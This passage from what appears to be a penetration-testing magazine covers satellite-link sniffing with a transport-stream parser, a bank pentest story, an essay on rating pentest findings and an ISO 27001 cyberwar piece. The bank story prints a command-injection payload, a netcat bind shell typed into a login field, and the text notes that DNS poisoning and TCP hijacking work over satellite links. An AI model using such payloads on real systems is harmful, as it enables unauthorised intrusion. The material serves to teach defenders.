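As an added example, not from the original article, here is a small Python parser for the kind of data a DVB receiver card hands you in the sat modem scenario: MPEG transport stream packets carrying IP datagrams via Multiprotocol Encapsulation (DSM-CC datagram sections, table_id 0x3E, as specified in ETSI EN 301 192). It extracts the destination MAC address, checks the section CRC, flags scrambled sections and decodes the IPv4/UDP headers of a cleartext one. The TS packet is produced by a helper in the block itself from a constructed IPv4/UDP datagram (documentation addresses 198.51.100.7 and 203.0.113.9), so nothing here is a real capture.

```python
import struct

TS_PACKET_LEN = 188
TS_SYNC = 0x47
MPE_TABLE_ID = 0x3E      # DSM-CC datagram_section used by DVB Multiprotocol Encapsulation (EN 301 192)


def crc32_mpeg2(data: bytes) -> int:
    """CRC-32/MPEG-2 (poly 0x04C11DB7, init 0xFFFFFFFF, no reflection, no final XOR)."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte << 24
        for _ in range(8):
            crc = ((crc << 1) ^ 0x04C11DB7) if crc & 0x80000000 else (crc << 1)
            crc &= 0xFFFFFFFF
    return crc


def build_mpe_ts_packet(pid: int, dst_mac: bytes, ip_datagram: bytes, cc: int = 0) -> bytes:
    """Wrap one IP datagram in a single MPE section inside one TS packet (constructed test data)."""
    section_length = 9 + len(ip_datagram) + 4           # header bytes after the length field + CRC_32
    header = bytes([MPE_TABLE_ID, 0xB0 | (section_length >> 8), section_length & 0xFF,
                    dst_mac[5], dst_mac[4],              # MAC_address_6, MAC_address_5
                    0xC1,                                # reserved=11, no scrambling, LLC/SNAP=0, current=1
                    0x00, 0x00,                          # section_number, last_section_number
                    dst_mac[3], dst_mac[2], dst_mac[1], dst_mac[0]])  # MAC_address_4 .. MAC_address_1
    section = header + ip_datagram
    section += struct.pack(">I", crc32_mpeg2(section))
    ts_header = bytes([TS_SYNC, 0x40 | (pid >> 8), pid & 0xFF, 0x10 | (cc & 0xF)])  # PUSI=1, payload only
    payload = b"\x00" + section                          # pointer_field = 0: section starts immediately
    return ts_header + payload + b"\xff" * (TS_PACKET_LEN - 4 - len(payload))


def parse_mpe_ts_packet(pkt: bytes) -> dict:
    """Pull the IP datagram out of a TS packet carrying a complete MPE section; verify its CRC."""
    if len(pkt) != TS_PACKET_LEN or pkt[0] != TS_SYNC:
        raise ValueError("not a TS packet")
    pusi = bool(pkt[1] & 0x40)
    pid = ((pkt[1] & 0x1F) << 8) | pkt[2]
    off = 4
    if (pkt[3] >> 4) & 0x2:                               # adaptation field present: skip it
        off += 1 + pkt[4]
    if not pusi:
        raise ValueError("section does not start in this packet (reassembly not handled)")
    off += 1 + pkt[off]                                   # pointer_field
    if pkt[off] != MPE_TABLE_ID:
        raise ValueError(f"table_id 0x{pkt[off]:02x} is not an MPE datagram_section")
    section_length = ((pkt[off + 1] & 0x0F) << 8) | pkt[off + 2]
    section = pkt[off:off + 3 + section_length]
    if len(section) != 3 + section_length:
        raise ValueError("section continues in later packets (reassembly not handled)")
    flags = section[5]
    dst_mac = bytes([section[11], section[10], section[9], section[8], section[4], section[3]])
    info = {"pid": pid, "dst_mac": dst_mac.hex(":"),
            "scrambled": ((flags >> 4) & 0x3) != 0,       # payload_scrambling_control
            "llc_snap": bool(flags & 0x02),
            "crc_ok": struct.unpack(">I", section[-4:])[0] == crc32_mpeg2(section[:-4]),
            "ip": None}
    datagram = section[12:-4]
    if not info["scrambled"] and not info["llc_snap"] and datagram and datagram[0] >> 4 == 4:
        ihl = (datagram[0] & 0x0F) * 4
        ip = {"src": ".".join(map(str, datagram[12:16])), "dst": ".".join(map(str, datagram[16:20])),
              "proto": datagram[9], "payload": datagram[ihl:]}
        if ip["proto"] == 17:                             # UDP: source/destination ports, 8-byte header
            ip["sport"], ip["dport"] = struct.unpack_from(">HH", datagram, ihl)
            ip["payload"] = datagram[ihl + 8:]
        info["ip"] = ip
    return info


# Constructed IPv4/UDP datagram: 198.51.100.7:8000 -> 203.0.113.9:8080, payload "hello" (checksums zero).
SAMPLE_IPV4_UDP = bytes.fromhex("450000210001400040110000c6336407cb007109" "1f401f90000d0000" "68656c6c6f")
SAMPLE_DST_MAC = bytes.fromhex("000d5caabbcc")

if __name__ == "__main__":
    print(parse_mpe_ts_packet(build_mpe_ts_packet(0x0400, SAMPLE_DST_MAC, SAMPLE_IPV4_UDP)))
```

In a real capture you will also meet sections split over several TS packets and LLC/SNAP framing; the parser raises rather than guessing in those cases, which is the safe default when the question is how much of a customer's unencrypted downstream can be read by anyone under the footprint.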
TCP/IP Attacks
Over a sat link a threat agent can try to exploit all the known flaws of the TCP/IP suite. For example it is possible to try to poison the DNS cache, or to hijack TCP connections. Moreover, if the scenario allows it, you can try to access applications not directly exposed through the Internet.
Despite what one might think, the equipment needed, at least for the sat modem scenario, is not expensive: you can set up a basic tool kit starting from 100 €. All you need is a good parabolic antenna and a SkyStar 2 DVB TV adapter [8].
Conclusion
As shown in the article, wireless technologies can harm your customer's business if the data they carry are not meant to be delivered across a shared medium and the technologies themselves are not properly protected. Offering a wide spectrum of security services for wireless technologies is a plus, even if in some cases the initial investment may be significant. Remember that, especially in this kind of penetration test, the analysis itself is only the starting point: the real challenge is to help the customer find a practical and cost-effective solution to mitigate the identified vulnerabilities.
FRANCESCO PERNA
A computer enthusiast since childhood, he has spent more than 15 years researching security issues related to applications and communication protocols, from both the offensive and the defensive point of view. He is a partner and technical director of Quantum Leap s.r.l., a company that offers security services to companies and organizations. http://www.linkedin.com/in/francescoperna – [email protected] – www.quantumleap.it
PIETRO MINNITI
A security professional for over 10 years, he has focused his research mainly on the ERP security field. As application security specialist at Quantum Leap, he performs security analysis on corporate networks and national critical infrastructure environments. http://www.linkedin.com/in/pietrominniti – [email protected] – www.quantumleap.it
References
[1] proxmark3 – https://code.google.com/p/proxmark3/wiki/HomePage
[2] Bus Pirate – http://dangerousprototypes.com/docs/Bus_Pirate_v3.5
[3] GoodFET – http://goodfet.sourceforge.net
[4] KillerBee – https://code.google.com/p/killerbee/
[5] Bluetooth Penetration Testing Framework – http://bluetooth-pentest.narod.ru/
[6] Martin Karger's blog – http://www.evilgenius.de/category/bluetooth/
[7] Bluetooth protocol analyzer – http://www.fte.com/products/BPA600.aspx
[8] SkyStar adapter – https://www.technisat.com/en_XX/
CASE STUDIES
Hacking a Bank
Putting million dollar locks on Barbie’s house
This story is a real life event that took place while I had a blackbox
external pentest for a client in the financial industry, but actually,
the same scenario could happen in any other sector.
A couple of years ago, I was contacted by a major commercial bank in my country to conduct a series of blackbox penetration tests against their external network, shortly after they had acquired a very expensive Information Security Management System from a major international audit firm. The real reason they contracted my services was in fact to see how their newly employed system would react in a real-life scenario, and the scope of my actions was to gain access to their internal network. No one, myself included, thought this was going to be an easy task. Challenge accepted!
According to the contract terms, I was permit-
ted to perform the attacks at any time, just like
a real life attacker. So, at first I thought it would
be wise to perform the initial assessment during
the day, in order to disguise my probes inside the
regular working hour traffic.
The network scan didn’t reveal any interesting
open ports, in fact, the only open active servers
were the two servers running DNS, two different
mail servers running on SSL and one server run-
ning HTTP and HTTPS. All services were up to
date and apparently well enough configured to
resist simple attacks, so I decided that I should
take a look at their web application in hope of
finding a way inside.
The web application was built with PHP and Ja-
vascript on a Unix commercial platform. By manu-
ally browsing the website, I saw a lot of interesting
places that showed a lot of promise for launching
further attacks, so, naturally, I decided to start an
automatic crawl of the website.
At first sight the application seemed very complex and with many pages, so I decided to start an aggressive crawl with a few tens of concurrent threads against it. After a few minutes, I noticed my crawler hung and I realized their IPS was blocking my probe attempts, probably due to a throttling mechanism. So I changed my IP address (remember, it was a ‘blackbox pentest’) and started a new, less aggressive crawl. After a few minutes, the same result: my crawler hung because my IP address was blocked again. Getting more and more frustrated, I decided to start a manual crawl of the application, just to see how it reacts, and how I should set up things for a successful automated crawl.
Indeed, the IPS didn’t block my manual crawl.
But setting the automated crawler to perform its
task at a human pace would’ve meant an incred-
ible amount of time. I took that bet and I let it crawl
while I started poking and probing around, playing
with different parameters just to see how the appli-
cation would react to a fuzzing tool. And I managed
to make it spill out a few application error messag-
es. Nothing great, I know, but still, it was some-
thing.
Soon, I started fuzzing the parameters I discov-
ered earlier as being prone to errors hoping I can
make them spill out even more interesting error
messages, such as SQL errors or at least some
input validation application errors. To my despair,
the IPS rules were perfectly set to match my at-
tacks and I was growing way too frustrated to
have the patience of discovering the limitations
they implied. So I decided to leave it for later,
and go out for a hot espresso just to clean up my
mind.
I returned to the office at around 22:00, eager to work. I decided I should redo everything from step 1, just in case I might have missed something earlier, so I started a new external network scan. I never hoped for anything to be different, but as soon as I started reading the output file, I noticed a new IP address as active, running a service on a very high port, 56635. Grabbing the banner on this port didn't reveal anything, so I decided to run AMAP.
‘Protocol on xx.xxx.xxx.xx:56635/tcp matches ssl’. Immediately I start a browser and... what do I see? The login page of a phpMyAdmin interface. I find out the version running and start looking around the Web for useful information about it, but the only thing I learned was that this was one of the newest versions, with little to no known vulnerabilities.
The only place I had left to try was to attack the
parameters in the login page itself, so I started
fuzzing those in hope of finding SQL injection or
similar.
But I never expected what was next to happen. My fuzzing tool warned me that something really weird was happening. Not in terms of error messages. Instead the server replied with HTTP/1.1 200 OK to a request that was specially crafted to be erroneous. Analyzing the ‘messy’ request, I realized it was a command injection request, one that should have never worked, not since 2003 anyway: I couldn't believe my eyes, but there was an Apache webserver running a vulnerable mod_auth_any, an Apache module which allows the use of third-party authentication programs. The problem with the module is a command injection vulnerability, and simply feeding the ‘;’ character in either the username or password field granted me access to the phpMyAdmin interface. But that was nothing. By crafting a special request I managed to bind a netcat to a free port, thus granting me access to the operating system: MISSION ACCOMPLISHED!
From what I learnt later, that server was an internal web portal with file sharing capabilities. Normally no services were running on the public interface of the server, but because administrators needed remote access to the administration panel, they thought it would be safe to have phpMyAdmin bound to a high port on the Internet-facing interface after work hours. That is why the first audit firm didn't discover the ‘cloaked’ service; this is also why my initial, working-hours assessment didn't find it either.
This is how, due to laziness, system administrators can introduce risks even into the most expensive information security management system, making hundreds of thousands of dollars worth as much as an outdated Apache version running a vulnerable and outdated authentication module.
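The cloaked service in the story above only became visible because the external scan was repeated at a different time of day. As an added example (not code from the original article), the Python helper below compares two nmap grepable (-oG) snapshots of the same range and reports open ports that appeared or disappeared between them; the two scan outputs embedded in the block are constructed to mirror the scenario (a 56635/tcp service that shows up only in the night snapshot) and are not the author's real results. The hosts, timestamps and nmap version string are placeholders.

```python
# Compare two nmap grepable (-oG) snapshots of the same range and report which open
# ports appeared or disappeared between them. Useful when a service is only exposed at
# certain hours. The scan output below is constructed, not real.
from typing import Dict, Set, Tuple

PortSet = Set[Tuple[int, str, str]]          # (port, protocol, service name)


def open_ports(grepable: str) -> Dict[str, PortSet]:
    """Map host -> open (port, proto, service) tuples from nmap -oG output."""
    result: Dict[str, PortSet] = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:"):
            continue                                     # comment lines and blanks
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]                 # drop the "(hostname)" part
        ports = result.setdefault(host, set())           # a host may have Status and Ports lines
        for entry in fields.get("Ports", "").split(","):
            parts = entry.strip().split("/")             # port/state/proto/owner/service/rpc/version/
            if len(parts) >= 5 and parts[1] == "open":
                ports.add((int(parts[0]), parts[2], parts[4]))
    return result


def exposure_diff(before: str, after: str):
    """Return (appeared, disappeared): host -> ports open in only one of the two snapshots."""
    b, a = open_ports(before), open_ports(after)
    hosts = set(b) | set(a)
    appeared = {h: a.get(h, set()) - b.get(h, set()) for h in hosts}
    disappeared = {h: b.get(h, set()) - a.get(h, set()) for h in hosts}
    return ({h: p for h, p in appeared.items() if p},
            {h: p for h, p in disappeared.items() if p})


# Constructed snapshots: the same /28 scanned during working hours and again at night;
# 56635/tcp on 203.0.113.13 is present only in the night snapshot.
DAY_SCAN = """# Nmap 6.25 scan initiated Tue May  7 10:02:11 2013 as: nmap -sS -p- -oG day.gnmap 203.0.113.0/28
Host: 203.0.113.10 ()\tStatus: Up
Host: 203.0.113.10 ()\tPorts: 53/open/tcp//domain///\tIgnored State: filtered (65534)
Host: 203.0.113.11 ()\tPorts: 443/open/tcp//https///, 465/open/tcp//smtps///\tIgnored State: filtered (65533)
Host: 203.0.113.12 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: filtered (65533)
# Nmap done at Tue May  7 10:41:09 2013 -- 16 IP addresses (3 hosts up) scanned in 2338.12 seconds
"""

NIGHT_SCAN = """# Nmap 6.25 scan initiated Tue May  7 22:03:40 2013 as: nmap -sS -p- -oG night.gnmap 203.0.113.0/28
Host: 203.0.113.10 ()\tPorts: 53/open/tcp//domain///\tIgnored State: filtered (65534)
Host: 203.0.113.11 ()\tPorts: 443/open/tcp//https///, 465/open/tcp//smtps///\tIgnored State: filtered (65533)
Host: 203.0.113.12 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: filtered (65533)
Host: 203.0.113.13 ()\tPorts: 56635/open/tcp//unknown///\tIgnored State: filtered (65534)
# Nmap done at Tue May  7 22:43:55 2013 -- 16 IP addresses (4 hosts up) scanned in 2415.07 seconds
"""

if __name__ == "__main__":
    appeared, disappeared = exposure_diff(DAY_SCAN, NIGHT_SCAN)
    for host, ports in appeared.items():
        for port, proto, service in sorted(ports):
            print(f"NEW  {host}:{port}/{proto} ({service})")
    for host, ports in disappeared.items():
        for port, proto, service in sorted(ports):
            print(f"GONE {host}:{port}/{proto} ({service})")
```

Scheduling the same scan at several times of day and diffing the results is cheap, and it is the check that catches "after hours only" exposures like the one described here, which a single working-hours assessment will miss every time.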
The contractor was shocked that I was able to
circumvent very expensive security mechanisms,
especially because, being a hacker I could have
easily gotten access to the internal network, thus
being able to further expand the compromise. The
biggest problem was that the attack went undetected; all they could catch on their IDS was my initial crawl of their main application, as no tools were needed to perform the actual attack: all I did was type ;nc -l -p 31337 -e /bin/bash in the authentication form's username field. The conclusion I might draw is that expensive security can be rendered useless using only tools like nmap, amap and pure intuition.
ANDREI BOZEANU
AB Consultancy Software SRL is a newly merged computer security company located in Bucharest, Romania, whose main area of activity is penetration testing and forensic examination. Our experts have over 20 years of international experience in the field of computer security research, in both offensive and defensive security, ranging from malware and antimalware research, software audit and exploit development to cryptology. Our customers are in the government, military and financial industries, based in Romania or abroad.
Do No Harm
A few years ago I engaged a global security consulting practice
to perform an attack and penetration exercise on the company
I worked for as the CISO. Shortly into the engagement, the
consultants approached me with some dire news. They had
discovered several High Risk vulnerabilities in one of the most
important corporate web applications, and were recommending
aggressive remediation measures.
More recently, I worked with a company that
had just completed a security scan of its
primary web application and had discov-
ered literally hundreds of High Risk vulnerabilities.
I was in the meeting when the CISO presented this
information to executives, and you could almost
see the blood drain from their faces. Very quickly,
the dialog in the room began focusing on aggres-
sive options for attacking the problems.
Infosec to the rescue, right? Unfortunately, no.
Misinformation
These days, everyone is pretty aware of the need
to minimize the likelihood for penetration testing
activities to adversely affect production data and
systems. In most cases, significant care is taken to
coordinate activities and get appropriate approvals
before work begins. Yet a more subtle but equally
critical problem is often overlooked – misinforming
the people we serve.
An executive’s plate is filled with aggressive com-
petitors, regulators who seem to want to bury them
in paperwork, technology that can fail at just the
wrong moment, market forces that seem to change
on a whim, human resource issues that would make Gandhi reach for a stick, and, oh yeah, cyber security issues. Improperly managed, any of these issues can ruin an organization. Because there are
never enough resources to cover everything, exec-
utives must choose which of the many challenges
they face will get their limited resources. To make
good choices they need good information regarding
expected costs and benefits. Relying upon impaired
or incomplete information can seriously affect deci-
sion quality and company welfare.
Back to the Scenarios
In the first scenario at the beginning of the article,
I examined the pen test findings and pushed back
on the consultants. Yes, they had identified weak-
nesses, but had they considered the frequency
of the kinds of attacks that would leverage those
weaknesses? How about the frequency of any sort
of attack against that application and especial-
ly the part of application where the weaknesses
existed? How much skill was required to exploit
those weaknesses? What kind of access to under-
lying sensitive data would be gained and/or what
level of control over the underlying systems? After
talking through these considerations, the consul-
tants backpedaled and changed the High severity
of their findings to Medium, and in several instanc-
es, to Low. As a result, my organization was able to
appropriately prioritize its remediation efforts and
avoid unnecessarily impacting key projects and
business operations.
In the second scenario, I intervened with some
questions for the CISO before the decision-making
went too far:
• Was the application new, or had it been on the
Internet for some time? (Answer: It had been in
place for years.)
• Were these weaknesses new, or had they like-
ly been there a while? (Answer: Most were be-
lieved to have been there for months or years.)
• Was the application subject to threat events
with any regularity? (Answer: Yes, it was con-
stantly being attacked.)
• Given the above, how come their company
was still in business? (Answer: Blank stare)
• Had the organization regularly engaged out-
side consultants to attack the application? (An-
swer: Yes, annually.)
• Were they hiring competent consultants? (An-
swer: Yes)
• Had those consultants successfully breached
the application at any time? (Answer: No)
Clearly, something wasn’t making sense. Was the
application scanning tool to be believed, or the
penetration testers? Or, perhaps neither? Regard-
less, everyone recognized that to rationally solve
the problem and to avoid wasting resources we
needed more, and better, information.
What’s Wrong?
Risk management is a probability issue. You can
talk to me all day long about what’s possible, but
until I understand the probable frequency and
magnitude of an event, I have no way to properly
gauge its relevance among all of the other issues
I face. Only when you apply some critical thinking
and a reasonably accurate understanding of risk
can you make decent estimates of the probable frequency and magnitude of an event.
Unfortunately, too often, I’ve seen testers rely on
their tools’ “risk” ratings. Newsflash folks – I have
never seen testing tools get risk right because they
use models and analytic formulas that are broken in
a number of important ways. At other times, I’ve seen
pen test results that clearly reflect the tester’s techni-
cal understanding of what’s possible but completely
disregard what’s probable. For example – “The hack-
ers could take control of this machine, navigate to
that machine, and then have access to the organiza-
tion’s crown jewels!” Yes, certainly, that could hap-
pen. In some cases, though, the odds of an asteroid
striking the organization’s data center next year may
be higher. If executives had to address everything
bad that could happen to their organizations they
would be out of business very quickly.
Getting Risk Right
A full treatise on risk analysis would require a
book. Nonetheless, some basic critical thinking
is all that’s required in most cases to avoid gross
misrepresentation of pen test results. Risk boils
down to “How often bad things are likely to occur,
and how bad they will likely be when they do oc-
cur.” When we think in these terms from a pen test
perspective, some basic considerations and ques-
tions will help us more accurately interpret the lev-
el of risk our findings represent. Think of these as
critical thinking “litmus tests” for pen test results.
• How long have the weaknesses existed in the
system/application? Consider the two dimen-
sions to this question – 1) how long an exploit
for the weakness has existed, and 2) how long
the system/application being tested has had
this weakness. In some cases, the system/
application may have had this defective code
from its inception, but the discovery of exploita-
tion methods is recent.
• Have there been any known compromises at
this organization as a result of these weak-
nesses?
• What can/do the logs tell us about how often
the system/application comes under attack?
(And it is often critical to differentiate “casual”
scanning/probing from focused attacks.)
• Which threat communities would consider the
organization to be a target, and what threat in-
telligence do we have that helps to inform us
about the level of attention this organization is
getting from the bad guys?
• What is the value proposition of the target or or-
ganization to the relevant hacking communities?
• How often is this weakness subject to attack in
the wild?
• What kinds of skills are required to leverage this weakness? As the exploit's difficulty rises, the number of capable threat agents falls, which should reduce the frequency of attacks.
• Would an automated attack work for this weak-
ness or would it require a manual effort?
• How noisy would an attack have to be in order
for the attacker to discover and then leverage
the weakness? In other words, how likely is it
that an attack would be noticed (given the de-
tection technologies in place)?
• Where does the weakness reside within the
system/application? Do attackers have to au-
thenticate before they even have the ability to
discover and leverage the weakness?
• Are there controls in place or inherent difficulties that reduce the likelihood that an attack will be successful?
• How large in volume is the sensitive data at
risk? Could it be acquired quickly, or would it
require a prolonged effort?
Critically thinking through penetration test findings would undoubtedly include other considerations that depend upon the organization, system/application, and threat landscape. Regardless, merely asking these questions helps ensure that we accurately inform decision-makers.
Bottom line: Any pen test finding you label “High
Risk” represents your professional opinion of a con-
dition that warrants immediate (and sometimes
costly) organizational attention. That being the case,
ask yourself this – if you’re sitting across the table
from a risk-focused client like me, can you profes-
sionally, rationally, and logically defend your claim?
Consultants have told me that sitting across the ta-
ble from me can be very uncomfortable when I start
challenging them about their assigned risk ratings.
In Summary
There is no question that penetration testing, done
well, can be incredibly valuable in helping execu-
tives make well-informed decisions to better man-
age their company’s risk landscape. A pen test,
however, can be worse than useless if it results
in wasted resources and unnecessary business
impact. The difference often hinges on the critical
thinking you apply when interpreting test results.
JACK JONES
Jack Jones has worked in technology for thirty years, specializing in information security and risk management for twenty-four of those years. During that time he's worked as a pen tester, written viruses (restricted to laboratory environments) and keystroke loggers, and disassembled malware as a hobby. He's also been a CISO for three different companies, including a Fortune 100 insurance company, a bank, and a consumer information bureau. Based on the lessons he learned dealing with executives as a CISO, Jack shifted his focus from being a “hacker of technology” to being a “hacker of risk”, leading him to develop the Factor Analysis of Information Risk (FAIR) framework for measuring risk. He is currently co-founder and President of CXOWARE, Inc.
WAR CAMP
Applying a Security Compliance Framework to Prepare Your Organization for Cyberwarfare and Cyberattacks
On Monday, CNN posted a web article with this headline, Nations Prepare for Cyberwar, describing the inevitability of a cyberwar that is coming or is possibly already here (Goldman, 2013).
One of the main disadvantages of the hyper-connected world of the 21st century is the very real danger faced by countries, organizations and people who use networked computer resources connected to the Internet: they are at risk of cyberattacks that could result in anything from denial of service to espionage, theft of confidential data, destruction of data, and/or destruction of systems and services. In recognition of these dangers, national leaders, business leaders and the military leaders of most modern countries now acknowledge that the potential, and likely eventuality, of cyberwar is very real. This article will introduce some concepts about the realities and weapons of cyberwarfare and discuss how an organization can use a security compliance framework of controls to mitigate the risks of cyberattacks and cyberwarfare.
The Simple Truths of this Article
1. Cyberwar is coming, or could already be here. All the signs, the news media coverage and the publicly known actions of the U.S. Government confirm it.
2. If you have an IT infrastructure that is important to your business operations, you need to protect your business from cyberattacks and cyberwarfare.
3. There are many things you can do, and things you cannot legally do if you are in the United States, to protect your business from cyberattacks and cyberwarfare. Restrictions in the U.S. Code, Title 10, and other cyber legislation strictly prohibit retaliation or going on the offensive. But you can prepare and protect yourself from cyberattacks.
4. In any organization, management support is required to understand and allocate the resources to defend against cyberattacks.
5. Understanding risk identification, threats, vulnerabilities and controls, and performing risk assessment and risk management, are essential to becoming an effective protector of IT assets.
6. Because of the complex nature of most IT infrastructures and assets and how they integrate with an organization's business operations, it is better to use some type of proven framework to assure that all the important aspects of compliance and infrastructure security have been addressed and are being measured.
Cyberwar Concepts
Cyberattacks and cyberwarfare tactics, by some expert estimates, date back to the early 1980s, when there was a set of suspicious explosions that were likely generated in control systems on some pipelines in Asia, though this has never been conclusively confirmed. The idea of using computers and software to attack another entity via networks is more commonly dated to the early 2000s and, by some accounts, well before that. The diagram from Lewis University (Figure 1) shows a brief graphic history between 2000 and 2009.
Cyberweapons That We Know About
Cyberattacks and cyberwarfare tactics have typi-
cally been in the realm of Distributed Denial of Ser-
vice (DDoS) attacks with some more sophisticated
attacks as shown in the Technolytics diagram be-
low (Figure 2).
Since 2007, well-orchestrated cyberwar attacks such as the DDoS attacks on Estonia (2007), Georgia (2008) and Kyrgyzstan (2009), as well as Stuxnet (2010), Duqu (2011) and Flame (2012), have all become known to the world through security researchers, their victims and the media. As a result, it has become apparent to most who are watching this area that cyberspace has become the new realm into which the field of international conflict has been extended, and that cyberwarfare is no longer a theoretical issue that could one day threaten those participants and systems that rely upon connections to the Internet and Internet-connected networks.
Figure 1. A Brief History of Cyberwarfare by Lewis University, Romeoville, IL
Figure 2. Classes of Cyberweapon Capabilities, by Technolytics
Unfortunately, however, despite the emergence of a new breed of intelligent cyberweapons (i.e. Stuxnet, Flame, Duqu and Shamoon) with the ability to strike with precision and accuracy, the present findings and research on cyberwarfare-related events show that the U.S. is playing catch-up, and doing so badly (Turanski and Husick, 2012).
The diagram in Figure 3 shows the rapid evolution of cyberweapons over time. According to this diagram, starting in about 2008 and until what is predicted to be about 2020, the evolution of the sophistication of cyberweapons will be quite significant. This rapid rise in the sophistication and capabilities of cyberweapons, coupled with their relative ease of use, proliferation and economic benefit, will make these weapons very compelling for military and strategic use, and make the likelihood of cyberwar increasingly significant for the foreseeable future.
Who Is the “Enemy” or the “Adversary”?
In the world of cyberattacks and cyberwarfare, the issue of who your adversary is usually depends on your perspective. From the perspective of the U.S. and its allies, the adversary usually falls into one of these five categories: Russia, China, North Korea, Iran, or non-state actors. Much is already known about our potential adversaries, such as Russia, China, North Korea and Iran, but what is perhaps less understood is the degree to which they have been successful in integrating cyberwarfare and cyberdeterrence capabilities into their own national war plans. Nevertheless, given the previous extensive experience of China, Russia and the U.S. with strategic war planning, it is likely that each of these countries stands the greatest chance of integrating cyberwarfare and cyberdeterrence capabilities into its respective war plans. Yet, as far back as June 2009, it was clear that the U.S. and Russia were unable to agree on a treaty that would create the terms under which cyberwarfare operations could and would be conducted (Markoff and Kramer, 2009).
DDoS as a Service, for as Low as US$20 Per Hour
We now live in a world where the Internet and malware have made it possible to buy services such as DDoS attacks against an enemy or a competitor for prices as low as $20 per hour. When you consider the implications of this idea, the economics will make the idea of tactical cyberattacks more appealing to organizations. I know some of the URLs where these services are available, but rather than give them advertisement, I would just invite you to do an Internet search using your favorite search engine.
Figure 3. Evolution of Cyberweapon Capabilities, 1994 – 2020, by Technolytics
Figure 4. Risk relationship diagram, from ISO27001.org
Figure 5. Relationships between IT security management controls, Threats and Assets (Exposures), Jaquith, 2007
What Is an ISMS?
The fast-paced, electronically-enabled business environment of the 21st century is characterized by the tactical and strategic uses of information as business enablers. In practically every organization, information is now seen as a primary asset and, as such, it must be protected. Yet the proliferation of and reliance on information in an organization also introduces responsibilities and risks which, if not addressed, can subject the organization to extraordinary risks that could severely impact the viability of the business. The best strategy for an organization to manage these new business realities is to adopt a strong compliance management posture in the area of Information Security, to ensure that its information assets are protected in the most comprehensive, standardized manner possible. Presently, the best tool to manage the challenges of Information Security is an enterprise Information Security Management System (ISMS). The ISMS is a centralized system of policies, procedures, and guidelines that, when created and uniformly applied, will provide the best practices to help ensure that an organization’s Information Security is being managed in a standardized way using documented best practices. The introduction of an ISMS into an organization’s business operations will serve to identify, document and classify information assets and risks, and then document the mitigation of risks using established, documented controls. When an organization has chosen the standardized ISO 27001 Security Management Framework, the key benefits of implementing an ISMS would be:
• The implementation of a standardized Information Security Management System in the organization
• Better management and fulfillment of the Information Security requirements from the organization’s clients
• Reduction of risks related to cyberattacks and cyberwarfare
• Reduction of the risk of loss of existing customers
• Increased opportunities for new business
• Reduction of the risk of regulatory penalties
• Reduction of the risk of reputational damage
• The creation of an Information Security-aware culture at the organization
• Enabling ISO 27001-compliant offices to communicate and conduct business in areas affected by Information Security in a standard way
• Better management of IT assets and their associated risks
• The ability to have an Information Security Management System that is based on the Deming model of Plan – Do – Check – Act for continuous process improvement
• The adoption of the most widely recognized international standard for implementing an ISMS
Note that Information Security has rapidly risen to the forefront as a serious business issue. Because of its rapid rise to prominence and the dynamic and evolving nature of threats and the associated risk management efforts, the models to measure and quantify the value of such projects can often seem frustrating at best. So while this ISMS project may be difficult to quantify using traditional methods such as return on investment, it is clear that the benefits of continued customer relationships, as well as the ability to attract future customers through a demonstrated strong and continually improving posture of Information Security compliance management, will far outweigh the costs associated with an ISO 27001 project. Indeed, after implementing the ISMS under ISO 27001 standards, an organization will have better control of the information that is the lifeblood of its business, and it will be able to demonstrate to its customers and its business partners that it too has adopted a strong posture of compliance in the area of Information Security.
What Is ISO 27001?
ISO 27001 is an international standard with 133 controls in 11 domains, which provide a structured standard for the creation of an Information Security Management System based on strongly focused risk management and continuous process improvement under the Plan – Do – Check – Act model. The present version was developed in 2005 and an updated version is expected to be published by ISO sometime in 2013. This version is predicted to have several additions that will focus on Cloud Computing and also on standardized IT services and service management as described under ITIL and ISO 20000. In fact, in October 2012, the ISO 27013 standard was published, and it demonstrates how to integrate an ISO 20000-based Service Management System with an ISO 27001-based Information Security Management System.
Figure 6. A Fast-track ISMS Implementation Project Timeline, William Slater, 2012
What a Cyberattack / Cyberwarfare Risk Remediation Project Using ISO 27001 Might Look Like
It is possible to create and implement an ISMS using a fast-track method as shown in Figure 6. Note that management must support such a project in terms of resources (monetary, people, and assets) and politically in order for it to be successful. Nevertheless, it is possible to accomplish such a project if management and the project team have the will and resources to succeed.
Should You Get Your Organization Certified in ISO 27001?
Should you get your organization certified in ISO 27001 if you make the effort to remediate your cyberattack and cyberwarfare risks using an ISO 27001 ISMS control framework? The quick answer is, it depends. Currently, there are fewer than 9000 ISO 27001 ISMS certificate holders worldwide. Despite the apparent emphasis on security and risk reduction, quite often organizations will pursue ISO 27001 certification either to comply with regulatory requirements (as is required in India), or as a business enabler, because their business partners and/or customers expect it or have greater confidence in an organization that has an ISO 27001 certification. Though it is not easy or inexpensive in terms of resources to earn or maintain an ISO 27001 certification, the return on investment, particularly in areas like North America and South America where ISO 27001 certification is still relatively rare, can be quite significant. Figure 7 below shows the numbers of ISO 27001 ISMS Certificate Registrants by continent as of 2011. Note that according to PECB, a certification body that trains and certifies ISO 27001 implementers and auditors, the number of ISO 27001 ISMS Certificate Registrants is expected to double each year in North America for the foreseeable future.
Is Compliance with the ISO 27001 Standard or Some Other Security Compliance Framework Still Important Even If Your Organization Doesn’t Get Certified?
Personally, I believe that the chief responsibility of the leadership of an organization is to recognize risks and reduce them, as cost-effectively as possible, to manageable levels, and to comply with the laws and regulations that impact its operating environment. Even if an organization does not seek or achieve a certification under a security compliance standard such as ISO 27001, the organization can embrace and comply with the security controls of a security compliance standard, and thereby significantly reduce its business and security risks. The value in each of these security compliance frameworks (i.e. ISO 27001, PCI DSS, FISMA, HIPAA, etc.) is that each offers a set of well-defined controls that are structured in a way that allows the organization that adopts them to visibly demonstrate its efforts to reduce risks to its assets and its operating environment.
Figure 7. ISO 27001 ISMS Registrants by Continent as of 2011 (source unknown)
Mapping to Achieve Compliance with Two or More Security Compliance Frameworks
When an organization is required to comply with two or more security compliance frameworks, a process known as “mapping”, using a table showing the similarity of various controls, is used to understand and communicate the specific controls of each standard, usually on a one-to-one basis. Typically, the standard that is already in place, or the one that is most familiar, is represented in the left column, and the newer standard that is required for a new compliance initiative is located in the right column. An example is shown in Figure 8 below.
Using ISO 27001 Controls to Defend Against Cyberwarfare and Cyberattacks
